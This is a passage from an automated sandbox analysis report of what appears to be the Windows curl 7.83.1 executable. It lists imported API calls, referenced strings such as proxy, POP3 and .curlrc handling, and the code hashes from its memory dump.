                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 000F0612
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
                                        • API String ID: 1294909896-2961970465
                                        • Opcode ID: 3ed602fb65d6c41e93f3d5fc2d7a3f9e8887b162ef12d1e184f670c4050be1c7
                                        • Instruction ID: 41106af0d040d075c2f23ba665929c80f6fa895dd2234f034d0e0c5aa0fd2f04
                                        • Opcode Fuzzy Hash: 3ed602fb65d6c41e93f3d5fc2d7a3f9e8887b162ef12d1e184f670c4050be1c7
                                        • Instruction Fuzzy Hash: E131E535B0060DEFDB088B94DC507BEBBB6EF84314F10807AE90197242DBB19D56DBA0
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FCDAE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FCE26
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: OS/400$SITE NAMEFMT 1
                                        • API String ID: 3061335427-2049154998
                                        • Opcode ID: ab1eb02adc54a486e3b33418f8d75464199e6bc02b12ee6f39a205750f9d20a2
                                        • Instruction ID: 71f79a5a3f95aef3b5399a9b5aab8bd8abe581892c357f34ef6872c9feff45e7
                                        • Opcode Fuzzy Hash: ab1eb02adc54a486e3b33418f8d75464199e6bc02b12ee6f39a205750f9d20a2
                                        • Instruction Fuzzy Hash: 7531C471A0411DDBEF24CF58DA41ABC7BF1EB44350F1840BAEA45EBB42CB705D42ABA5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 000CEE54
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?), ref: 000CEE65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                        • API String ID: 1294909896-250881521
                                        • Opcode ID: 500595a06d02437939dbc0f29ae76f0f1a03f0897b451b2dec8e09743bf474d1
                                        • Instruction ID: 5a9fa458f1591249d32b9bc8e54e94a8298c213c1d0720144f86670a19b808b1
                                        • Opcode Fuzzy Hash: 500595a06d02437939dbc0f29ae76f0f1a03f0897b451b2dec8e09743bf474d1
                                        • Instruction Fuzzy Hash: 26210D32A446B0BFCB315794EC42F9E37E09B45BB0F14427CFC04EB191E7A08E128691
                                        APIs
                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000E3B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: tolower
                                        • String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
                                        • API String ID: 3025214199-127164392
                                        • Opcode ID: fe02b5b626877ad49ee8f95a31b79bcf85c152fdddef295c499d8909968b53e7
                                        • Instruction ID: ed03d3b32779e631419e33c9a3cda853f51ee4a37ba513c6327f15c8f1f35e28
                                        • Opcode Fuzzy Hash: fe02b5b626877ad49ee8f95a31b79bcf85c152fdddef295c499d8909968b53e7
                                        • Instruction Fuzzy Hash: 2E213A31E007B54BC7629B295904BFA7BB46F91764F0541E6E885BB302DF60CE4987D0
                                        APIs
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,00000000,00000001,000009C9,000009C9,?,000E1E86,?,?,00000000), ref: 000E8B1D
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,000E1E86,?,?,00000000), ref: 000E8B30
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,000E1E86,?,?,00000000), ref: 000E8B3C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E8B69
                                        • closesocket.WS2_32(000E1E86), ref: 000E8B7A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8B94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                        • String ID:
                                        • API String ID: 469868127-0
                                        • Opcode ID: aa114a9388969b9b549d9f9bafefb33577adaf652a94d54db222f701c8c14bd0
                                        • Instruction ID: e5dbd76ffe00b12ebfb6651101bc510b79ab0b8fb3111c196d1ea67f3a03487f
                                        • Opcode Fuzzy Hash: aa114a9388969b9b549d9f9bafefb33577adaf652a94d54db222f701c8c14bd0
                                        • Instruction Fuzzy Hash: 6611C136A00610EFCB099F60D94879DBBB2FF48311F148069E805A3761DB70BC91CBE1
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EB8C8
                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 000EB9D9
                                        • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 000EB9F4
                                        Strings
                                        • Failed to alloc scratch buffer, xrefs: 000EB8D5
                                        • We are completely uploaded and fine, xrefs: 000EBAC3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Ioctlmallocsetsockopt
                                        • String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
                                        • API String ID: 3560301164-2419666956
                                        • Opcode ID: 95ce2eed7cbdeb2b8f3d651eb2724bfae7eae5bcbbd087a50af3986bf8b57b4d
                                        • Instruction ID: 657ca5dd9bdd2135ba253dcafa4732515cd37a3bbeb8ffeea979af15f8a5afe5
                                        • Opcode Fuzzy Hash: 95ce2eed7cbdeb2b8f3d651eb2724bfae7eae5bcbbd087a50af3986bf8b57b4d
                                        • Instruction Fuzzy Hash: 02C1A071B04686AFDB58CF29C581BEBB7F5BF44310F14417AE818EB242D770A841CBA1
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CD618
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,001207BC), ref: 000CD631
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,001207BC), ref: 000CD6C9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CD715
                                        Strings
                                        • unrecognized protocol '%s', xrefs: 000CD6AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strtok$_strdupfree
                                        • String ID: unrecognized protocol '%s'
                                        • API String ID: 2873614617-1936080967
                                        • Opcode ID: 2ce21cf608d15dcc9a44d07c2360ce92b8c6e0149e11dd80f85d621a55cdf183
                                        • Instruction ID: 0a1cf0391792372617a5a1dde42ee4445616fc6542d7340810778935d04b4298
                                        • Opcode Fuzzy Hash: 2ce21cf608d15dcc9a44d07c2360ce92b8c6e0149e11dd80f85d621a55cdf183
                                        • Instruction Fuzzy Hash: 8331F631A04611DBDB619B689995F7DBBE1EB45764F20023FE84AE7241E770DC01C790
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000), ref: 000F5305
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F533E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F535A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5391
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: realm
                                        • API String ID: 2653869212-4204190682
                                        • Opcode ID: 630b524f63615f5044bce3ac849ce412de157144f9932f054688095d240ca5bb
                                        • Instruction ID: 4055240bf37692505751f6827ff71bbc2ceadce73f9f126eb4e839452df06828
                                        • Opcode Fuzzy Hash: 630b524f63615f5044bce3ac849ce412de157144f9932f054688095d240ca5bb
                                        • Instruction Fuzzy Hash: AE310831900B18DBCF649F18DC80ABEB7F4EF49352F1441AEEA8597642DBB08D859F60
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F7629
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F766C
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(-000001F4,-000001F4,?,000003E8,00000000), ref: 000F769F
                                        Strings
                                        • Connection time-out, xrefs: 000F75F6
                                        • set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 000F768B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_time64
                                        • String ID: Connection time-out$set timeouts for state %d; Total % I64d, retry %d maxtry %d
                                        • API String ID: 3039015236-3364887516
                                        • Opcode ID: 3f95387cc8c250c5ad497e77381fe0aa1d783ae2185b6a4f7888f76f34a26037
                                        • Instruction ID: bc2d34f6ce70fb38ab5f87215e1a921e58b0efbe3926077bfccadb59f37ad66b
                                        • Opcode Fuzzy Hash: 3f95387cc8c250c5ad497e77381fe0aa1d783ae2185b6a4f7888f76f34a26037
                                        • Instruction Fuzzy Hash: 01210671608B045FD7389E299C05D7B76DAEBC8710F240E3FF149C6681FB61D940A791
                                        APIs
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,00000000,00000000,?,?,000D09E5,00000000,?,000D07A5,?,?), ref: 000D0896
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,000D09E5,00000000), ref: 000D08FD
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00121D90,00000000,000D09E5,00000000,?,000D07A5,?,?), ref: 000D093B
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,?,?), ref: 000D094F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputc$fputs
                                        • String ID: u%04x
                                        • API String ID: 1019900953-2707630279
                                        • Opcode ID: cf6062fd2253fcff0cdfc5818b6769876d7c319baf4394a2091f86814ee66eed
                                        • Instruction ID: ee66688d58c65e532b1c5897aa506847a1690f48fa8c27b01971bd2ac1a3164b
                                        • Opcode Fuzzy Hash: cf6062fd2253fcff0cdfc5818b6769876d7c319baf4394a2091f86814ee66eed
                                        • Instruction Fuzzy Hash: 64214931189325B5F638452ABC3DBFBAF99DB537B4F648017F14D42783CA524502C1B0
                                        APIs
                                        • getsockname.WS2_32(?,?,?), ref: 000FA14D
                                        • accept.WS2_32(?,?,00000080), ref: 000FA175
                                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 000FA1D8
                                        Strings
                                        • Error accept()ing server connect, xrefs: 000FA192
                                        • Connection accepted from server, xrefs: 000FA1A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: acceptgetsocknameioctlsocket
                                        • String ID: Connection accepted from server$Error accept()ing server connect
                                        • API String ID: 36920154-1795061160
                                        • Opcode ID: a7dbd59b720075875407eb50890f62fde553191b5e8f84b40d81eabd22f8f900
                                        • Instruction ID: c57f879010c5f91bbe2dfac295ea655029b58618b4096e274b713ae36ebdc9de
                                        • Opcode Fuzzy Hash: a7dbd59b720075875407eb50890f62fde553191b5e8f84b40d81eabd22f8f900
                                        • Instruction Fuzzy Hash: 3831C471A00218EFDB649F34DC45BE9B7B9BF45310F1081AAE80DA7282DF745D889BA1
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F9557
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F9584
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F95A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrcallocfree
                                        • String ID: +$Got unexpected pop3-server response
                                        • API String ID: 1802162112-3277052657
                                        • Opcode ID: 41998734cd11401c1fdab479fedeb16f2adaf1996f27bcd41c5f93ffaeb18631
                                        • Instruction ID: 6dd7bc681ffe3c12d970af247e708725bc81a9901d2ae4fc27663601067d812e
                                        • Opcode Fuzzy Hash: 41998734cd11401c1fdab479fedeb16f2adaf1996f27bcd41c5f93ffaeb18631
                                        • Instruction Fuzzy Hash: 4E317B71A0060AAFEB2ACF20E845BB9FBE5FF40760F20412AE641A3581DB706E409794
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000EE982,00000000,?,?,?,000EEB73), ref: 000EE849
                                        • htons.WS2_32(?), ref: 000EE85B
                                        • inet_pton.WS2_32(00000017,::1,?), ref: 000EE877
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callochtonsinet_pton
                                        • String ID: ::1$localhost
                                        • API String ID: 4237634067-466958357
                                        • Opcode ID: b416fbfd365cf6dcc3bf729aac4182bff93ef7ef9fca49d153b1b9a9ba270dba
                                        • Instruction ID: 48dafa9f107e0f1330e311986ac4262cb89a8c54ff61566f49c2508d680dc90e
                                        • Opcode Fuzzy Hash: b416fbfd365cf6dcc3bf729aac4182bff93ef7ef9fca49d153b1b9a9ba270dba
                                        • Instruction Fuzzy Hash: 8C21CF32A10258DFDB04CF94D885BDB77F9FF48325F10406AE808AF181DBB0A945CB95
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E9EDF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E9F59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrfree
                                        • String ID: %s%s%s:%d$Host$Host: %s
                                        • API String ID: 653773606-4134764909
                                        • Opcode ID: f52bea3945a4ef136b7f910b4072ff9bdaec4c3833f0dc7a209dfd1adeab0d5a
                                        • Instruction ID: a410b5a2614b609e11c8b6e2afe3332d36933169002a3488de3ca8b1c7acb9cf
                                        • Opcode Fuzzy Hash: f52bea3945a4ef136b7f910b4072ff9bdaec4c3833f0dc7a209dfd1adeab0d5a
                                        • Instruction Fuzzy Hash: C0113D72308215BFD7189F55AC82AAB7BEADF81B70B11403AFD05EB381E7709C1186B0
                                        APIs
                                        • htons.WS2_32(?), ref: 000EE8FF
                                        • inet_pton.WS2_32(00000002,127.0.0.1,?), ref: 000EE913
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,000EEB73,?,?,?), ref: 000EE937
                                          • Part of subcall function 000EE822: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000EE982,00000000,?,?,?,000EEB73), ref: 000EE849
                                          • Part of subcall function 000EE822: htons.WS2_32(?), ref: 000EE85B
                                          • Part of subcall function 000EE822: inet_pton.WS2_32(00000017,::1,?), ref: 000EE877
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callochtonsinet_pton
                                        • String ID: 127.0.0.1$localhost
                                        • API String ID: 4237634067-2339935011
                                        • Opcode ID: b7815c138b5559b2184e1d252797137e728d5a55c616c10525ea7505eaef3a06
                                        • Instruction ID: fe4a4b17756f541969c267cd70d60b634256ab46e18abb36d9ecc66081ffba19
                                        • Opcode Fuzzy Hash: b7815c138b5559b2184e1d252797137e728d5a55c616c10525ea7505eaef3a06
                                        • Instruction Fuzzy Hash: 1711B175A00348DFDB05CF95E88569BBBF5FF89314F20406AE804AB242D7B19985CB90
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F43
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7F5F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F89
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7FA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: a
                                        • API String ID: 1865132094-3904355907
                                        • Opcode ID: bac169f07294905e7857cf752546b7f5a673c47d12f542de76fab41cd6dd7dd1
                                        • Instruction ID: d998a91a5f364429582f8a8927cbd0c7a27ca610a3bf413ce03ce08ca0dddb0f
                                        • Opcode Fuzzy Hash: bac169f07294905e7857cf752546b7f5a673c47d12f542de76fab41cd6dd7dd1
                                        • Instruction Fuzzy Hash: 0121A17460C7819FC7A4CF749494BAFB7E4AF8A315F188D2EE59ED7240DB3094868741
                                        APIs
                                        • GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,0012F580,00000200,.curlrc,00000000,00000000,.curlrc,?,000CDC8B,?,00000000,00000000), ref: 000CDB9B
                                        • _strrchr.LIBCMT ref: 000CDBAC
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(0012F580,00117A20,00000000,00000200,%s%s,0011734C,.curlrc,?,000CDC8B,?,00000000,00000000), ref: 000CDC03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: FileModuleName_strrchrfopen
                                        • String ID: %s%s$.curlrc
                                        • API String ID: 494197015-3900187666
                                        • Opcode ID: a2a51390a2fa733fb23974f9e09ff9c63ba9433901ec41766bef55b4ec94ee41
                                        • Instruction ID: 08f7b09011899b5e806712a1768803443730db242875d015c135019f12126b3b
                                        • Opcode Fuzzy Hash: a2a51390a2fa733fb23974f9e09ff9c63ba9433901ec41766bef55b4ec94ee41
                                        • Instruction Fuzzy Hash: 97112B35208205AEEB1C5F389D85FFF7BA9DF86390F14417EE44697282D6A29D458270
                                        APIs
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Build-time engines:), ref: 000C8BAB
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0( <none>), ref: 000C8BDB
                                          • Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
